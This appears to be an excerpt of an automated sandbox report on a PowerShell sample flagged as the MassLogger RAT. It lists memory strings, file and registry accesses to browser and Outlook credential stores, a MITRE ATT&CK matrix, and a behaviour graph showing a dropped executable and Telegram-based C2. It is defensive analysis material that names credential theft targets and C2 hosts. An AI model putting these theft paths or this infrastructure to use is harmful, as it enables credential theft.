            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(=[
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX}l
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD56
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q np
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`*n
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,g?
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8_*
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLCu
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDw-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh;N
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q Mf
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q43x
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPM9
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qx|]
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX;X
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdte
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\e<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt33
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`y
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh]'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtSQ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q| s
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0N+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qx[S
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q ,\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,ei
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<$7
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdS[
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtu*
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHZX
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdR3
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhyw
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX|'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdrQ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhzS
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q Jh
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,C7
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qTr[
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD1L
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q41V
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@jc
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$3*
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPIO
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q )^
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,bk
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qP)1
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxxu
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\A4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPk(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@IY
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt/I
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\foreign.ps1 VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected MassLogger RAT
            Source: Yara matchFile source: 4.2.x.exe.2d0b410.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.x.exe.2d1ca44.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.x.exe.2d2e09c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.x.exe.2d2e09c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.x.exe.2d1ca44.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.x.exe.2d0b410.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: x.exe PID: 8140, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8184, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected MassLogger RAT
            Source: Yara matchFile source: 4.2.x.exe.2d0b410.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.x.exe.2d1ca44.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.x.exe.2d2e09c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.x.exe.2d2e09c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.x.exe.2d1ca44.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.x.exe.2d0b410.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: x.exe PID: 8140, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8184, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		Boot or Logon Initialization Scripts312
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		13
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)3
            Obfuscated Files or Information            		Security Account Manager11
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		11
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
            Software Packing            		NTDS2
            Process Discovery            		Distributed Component Object Model21
            Input Capture            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp            		LSA Secrets31
            Virtualization/Sandbox Evasion            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1615013 Sample: foreign.ps1 Startdate: 14/02/2025 Architecture: WINDOWS Score: 100 27 reallyfreegeoip.org 2->27 29 api.telegram.org 2->29 31 2 other IPs or domains 2->31 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 49 6 other signatures 2->49 8 powershell.exe 16 2->8         started        12 notepad.exe 5 2->12         started        signatures3 45 Tries to detect the country of the analysis system (by using the IP) 27->45 47 Uses the Telegram API (likely for C&C communication) 29->47 process4 file5 25 C:\Users\user\AppData\Local\Temp\x.exe, PE32 8->25 dropped 57 Suspicious execution chain found 8->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 8->59 61 Powershell drops PE file 8->61 14 x.exe 3 8->14         started        17 conhost.exe 8->17         started        signatures6 process7 signatures8 63 Antivirus detection for dropped file 14->63 65 Multi AV Scanner detection for dropped file 14->65 67 Writes to foreign memory regions 14->67 69 2 other signatures 14->69 19 RegAsm.exe 15 2 14->19         started        23 RegAsm.exe 14->23         started        process9 dnsIp10 33 checkip.dyndns.com 132.226.8.169, 49726, 80 UTMEMUS United States 19->33 35 api.telegram.org 149.154.167.220, 443, 49770 TELEGRAMRU United Kingdom 19->35 37 reallyfreegeoip.org 104.21.80.1, 443, 49732 CLOUDFLARENETUS United States 19->37 51 Tries to steal Mail credentials (via file / registry access) 19->51 53 Tries to harvest and steal browser information (history, passwords, etc) 19->53 55 Contains functionality to register a low level keyboard hook 23->55 signatures11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.